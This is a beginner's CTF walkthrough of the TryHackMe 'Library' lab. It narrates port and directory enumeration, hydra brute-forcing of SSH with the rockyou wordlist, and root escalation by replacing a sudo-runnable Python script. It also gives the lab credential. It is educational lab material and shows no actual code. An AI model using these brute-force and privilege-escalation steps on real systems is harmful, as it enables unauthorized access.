Library — CTF Walkthrough — TryHackMe
Welcome to my very first writeup on walkthrough of TryHackMe Room Library.
So without further ado let’s get in.
Enumeration:
So our first step after booting the target is enumeration. Using the famous tool ‘nmap’
We found port 22 & 80 are open and running ssh & http services respectively.
We can’t do anything on ssh bcoz we don’t have the credentials yet. So let’s browse to the IP.
We got the landing page:
This is a static web page without any functionality. Looking at the source code got nothing interesting. Only one thing I noticed is the name mentioned on the webpage i.e. “meliodas”. Keeping it up.
Now let’s try to enumerate hidden directories using ‘gobuster’
Nothing interesting here except ‘robots.txt’ file. Let’s check it out
So here given user-agent: rockyou. This might be a hint to us. So previously we found a username and here the name of wordlist is given. So I think the password must be in this wordlist only. Let’s try to crack it using the tool ‘hydra’
So we’ve got the password and now we can login to ssh.
Exploitation:
So now we’ve got the user flag.
Privilege Escalation:
I tried to enumerate further to find something vulnerable
I tried searching exploits on the kernel as well as ubuntu release but I didn’t found anything useful. Then I tried to find files with SUID bit set and also looked for running cronjobs, but nothing useful.
Then I listed the sudo commands that I can run as root user and found that I can run python file ‘bak.py’ as root user.
I listed the contents of ‘bak.py’ file & it’s task was to zip the contents of the ‘/var/www/html/’ directory and store the zip into ‘/var/backups/’ with name ‘website.zip’.
Then I tried to edit the file but I got Permission Denied error. But then I thought what if I deleted the original file and then create another one with the same name and in the same directory? So I tried it and guess what, it succeeded. So now we’ve full permission to edit the file and after that we can run it with root privileges.
So I edited the file and the final file looks like this:
Now when we run the file using ‘sudo’ it’ll give us a shell with root privileges. Let’s run it.
Oops ! We got an error. That means we can’t run like this.
Remember in the output of ‘sudo -l’ was given the absolute path of file ‘bak.py’. If you don’t know about absolute path click here. So it means we also have to use the absolute path of the file in our command. So let’s try it.
And that’s it. We are root now ! So it was a much easier CTF and very good for beginner.
Quick Recap:
First of all we enumerated the open ports on the target and got ports 22 & 80 open. Then we found the username “meliodas” on the landing page. Then we found ‘robots.txt’ file from the directory bruteforcing attack. Opening the robots.txt file we found a hint that we can use the famous wordlist ‘rockyou.txt’ to bruteforce the password. So we used the tool hydra to bruteforce the ssh password for username “meliodas” and we got the password “iloveyou1”. So we gained access to the target and found the user flag. Now the time for escalating our privileges. We enumerated the system and found a python file which we can run as root. But the problem was we were unable to edit that file. So we deleted it and created a new file with the same name and with the exploit code which will give us root shell. And running the file using sudo we got the “root” privileges and got full control over the target.
So it was not very difficult to solve this CTF. I hope you liked my writeup. And from now onwards, I’ll be publishing more walkthroughs of CTFs. So if you liked this do follow me and Thank you for reading:)